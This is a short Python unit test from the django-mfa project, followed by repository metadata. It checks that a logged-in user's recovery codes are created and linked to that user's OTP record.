def test_recovery_codes_generated(self):
user_codes = UserRecoveryCodes.objects.filter(user=UserOTP.objects.filter(
user=auth.get_user(self.client)).first()).first()
self.assertEqual(self.user_codes, user_codes)
| MicroPyramid/django-mfa | django_mfa/tests/test_models.py | Python | mit | 2,572 | 0.001166 |